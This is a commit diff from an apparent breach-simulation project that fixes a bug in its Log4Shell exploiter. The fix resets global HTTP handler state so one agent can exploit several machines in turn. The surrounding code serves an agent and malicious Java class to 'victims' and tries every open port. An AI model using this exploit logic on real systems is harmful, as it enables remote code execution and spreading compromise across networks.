p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Agent: fix a bug in log4shell 

Fix a bug that prevents single agent from exploiting multiple machines, by resetting the state of global HTTPHandler params
This commit is contained in:
vakarisz 2022-01-06 16:58:40 +02:00
parent a38536b59b
commit 7ba2051bf6
1 changed files with 11 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
monkey/infection_monkey/exploit/log4shell.py
View File

@ -50,13 +50,10 @@ class Log4ShellExploiter(WebRCE):
def _exploit_host(self): def _exploit_host(self):
self.start_servers() self.start_servers()
try: try:
self.exploit(None, None) return self.exploit(None, None)
finally: finally:
self.stop_servers() self.stop_servers()
# If java class was downloaded it means that victim is vulnerable
return Log4ShellExploiter.HTTPHandler.class_downloaded
def start_servers(self): def start_servers(self):
# Start http server, to serve agent to victims # Start http server, to serve agent to victims
paths = self.get_monkey_paths() paths = self.get_monkey_paths()
@ -140,7 +137,7 @@ class Log4ShellExploiter(WebRCE):
else: else:
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH) return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
def exploit(self, url, command): def exploit(self, url, command) -> bool:
# Try to exploit all services, # Try to exploit all services,
# because we don't know which services are running and on which ports # because we don't know which services are running and on which ports
open_ports = [ open_ports = [
@ -158,7 +155,8 @@ class Log4ShellExploiter(WebRCE):
"service_name": exploit.service_name, "service_name": exploit.service_name,
"port": port, "port": port,
} }
return return True
return False
class HTTPHandler(http.server.BaseHTTPRequestHandler): class HTTPHandler(http.server.BaseHTTPRequestHandler):
@ -166,6 +164,11 @@ class Log4ShellExploiter(WebRCE):
class_downloaded = False class_downloaded = False
stop = False stop = False
@staticmethod
def reset():
Log4ShellExploiter.HTTPHandler.class_downloaded = False
Log4ShellExploiter.HTTPHandler.stop = False
def do_GET(self): def do_GET(self):
Log4ShellExploiter.HTTPHandler.class_downloaded = True Log4ShellExploiter.HTTPHandler.class_downloaded = True
logger.info("Java class servergot a GET request!") logger.info("Java class servergot a GET request!")
@ -185,6 +188,8 @@ class Log4ShellExploiter(WebRCE):
): ):
server.handle_request() server.handle_request()
Log4ShellExploiter.HTTPHandler.reset()
def get_java_class_server_thread(self, ip: str, java_class: bytes): def get_java_class_server_thread(self, ip: str, java_class: bytes):
Log4ShellExploiter.HTTPHandler.java_class = java_class Log4ShellExploiter.HTTPHandler.java_class = java_class